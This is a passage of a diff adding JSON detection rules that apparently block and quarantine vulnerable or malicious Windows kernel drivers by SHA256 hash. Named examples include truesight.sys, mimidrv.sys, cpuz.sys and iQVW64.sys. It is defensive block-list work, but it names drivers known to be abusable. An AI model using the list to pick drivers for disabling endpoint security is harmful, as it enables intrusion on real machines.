+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c6fbdc8-d550-5eeb-aa66-85cc232090ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474347Z",
+ "creation_date": "2026-03-23T11:45:31.474350Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474358Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe60f9bab775440a560b122a53102527bdf4573bd94c0de84de986e76991ab08",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c87d2c0-e3ad-51c9-9ba6-7ea2b5859cbf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821162Z",
+ "creation_date": "2026-03-23T11:45:30.821166Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0fc3bc6e81b04dcaa349f59f04d6c85c55a2fea5db8fa0ba53d3096a040ce5a7",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c8fc1a9-2f9a-58cb-b95c-5d44ca101e26",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825780Z",
+ "creation_date": "2026-03-23T11:45:30.825783Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825788Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85a577c789691e3805667ac56aafcf304230bf3c6885a8ec8392e334cce49cf0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c9084e4-adea-509f-83d0-c60d5376eaab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157530Z",
+ "creation_date": "2026-03-23T11:45:31.157532Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157537Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a9cd02916a4d08c36c592dce91e5c9e9d35a038fa4b95a6ad22d12800561b06",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0c976206-4181-5931-9267-3ab23140185f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488099Z",
+ "creation_date": "2026-03-23T11:45:31.488101Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488106Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c0899364deaa8fd14bfd9a2bb8669b0dd586e5cff00568f9d36d731228f5579",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ca11f8f-872d-5ec8-a8df-724150f08f59",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455192Z",
+ "creation_date": "2026-03-23T11:45:30.455195Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455204Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b430d3a0bdb837a5d6625d3b1cef07abd1953f969869ff6cf7ba398ae605431a",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ca331fe-0162-5cd9-87fd-5134e606007a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472274Z",
+ "creation_date": "2026-03-23T11:45:30.472278Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472287Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "572c545b5a95d3f4d8c9808ebeff23f3c62ed41910eb162343dd5338e2d6b0b4",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0caa0fc2-1ba8-51df-a23d-94a19eccd905",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827907Z",
+ "creation_date": "2026-03-23T11:45:31.827909Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827917Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f87173cf9fcab276073fbfd6b27a424dd09d8411dbba87cf6ba3374f1b19efe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0cae90df-b4a9-5c34-abbb-6d1df609dc5a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829272Z",
+ "creation_date": "2026-03-23T11:45:31.829275Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829284Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "521b2e2f677df0224e3c0ccc829b2c71299058b5ea88c9b00ca6c3fdd622698d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0cb8c1a7-0921-531f-9df9-876ec067d8b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828102Z",
+ "creation_date": "2026-03-23T11:45:30.828104Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828109Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e88722b68e9fe0c7676aecc6829b9873b43d9b76e49d7678301891b6d6ecb35",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0cbddf44-5dd5-5c60-a65e-0601b365806b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141594Z",
+ "creation_date": "2026-03-23T11:45:31.141596Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141601Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "83278f083a9773ac1bad4f31363fed125e14528bdea0f941e5efd3dc1cb51c17",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0cc21fb6-22ac-53fe-8e71-fa1adeaf48b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828065Z",
+ "creation_date": "2026-03-23T11:45:30.828068Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828073Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8fc9a091c3dc6e053e044038f24bbc16028078c0fa40c5be19cbfb3ed81ea16d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0cc3ff37-e564-5db1-b054-e0be9e33e07f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461183Z",
+ "creation_date": "2026-03-23T11:45:30.461186Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461194Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0bd1523a68900b80ed1bccb967643525cca55d4ff4622d0128913690e6bb619e",
+ "comment": "Vulnerable Kernel Driver (aka sfdrvx32.sys) [https://www.loldrivers.io/drivers/6c0c60f0-895d-428a-a8ae-e10390bceb12/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0cd288f8-70ff-560b-ac35-4b100e2a215a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465170Z",
+ "creation_date": "2026-03-23T11:45:30.465173Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465181Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2fd43a749b5040ebfafd7cdbd088e27ef44341d121f313515ebde460bf3aaa21",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0cd50bf2-4433-5da8-8cc2-19f116b57fbf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808155Z",
+ "creation_date": "2026-03-23T11:45:31.808158Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808165Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "355668540e0dd71fe784452303f8e45e27fc4820720eb934ff6851089967dea0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ced8c16-4c62-551e-8e0a-4711dd9d272a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605004Z",
+ "creation_date": "2026-03-23T11:45:29.605006Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605011Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a943b358313881effa1cfd88c1755901a09596bf0e5423bf79e37b013d3fa534",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0cefec22-73e9-5321-b773-3e194a5ae513",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481694Z",
+ "creation_date": "2026-03-23T11:45:30.481696Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481702Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f46c524b79b9b1eb7efd5275dd1604de94560b52edca70ba4e47037f4b55da47",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d02bffe-47d2-5bc1-b232-1d56f99874eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155859Z",
+ "creation_date": "2026-03-23T11:45:31.155861Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155867Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b5f47ee3e3e18fc5275089a706f1c1a36eaec4a7409c973e988bf1d4a82a69b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d0570c5-89e1-51d0-803e-84ca6f953171",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455583Z",
+ "creation_date": "2026-03-23T11:45:30.455586Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455595Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7125c9831a52d89d3d59fb28043b67fbe0068d69732da006fabb95550d1fa730",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d0733d4-e9d1-5db6-81c1-6133768502e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493469Z",
+ "creation_date": "2026-03-23T11:45:31.493470Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493476Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "41d956f4ca7b9e152f56279263921e933976ccf68a50d67acb17ebb4d5de13e6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d195ab8-bde3-5581-9bb7-c1b87771c7a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971890Z",
+ "creation_date": "2026-03-23T11:45:29.971892Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d0580c20c1ba74cf90d44c82d040f0039542eea96e4bbff3996e6760f457cee",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d1e1c6d-ad40-5731-b19d-56da38105451",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979376Z",
+ "creation_date": "2026-03-23T11:45:29.979378Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979384Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "50819a1add4c81c0d53203592d6803f022443440935ff8260ff3b6d5253c0c76",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d22072f-e246-5353-98f4-295da2d365d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
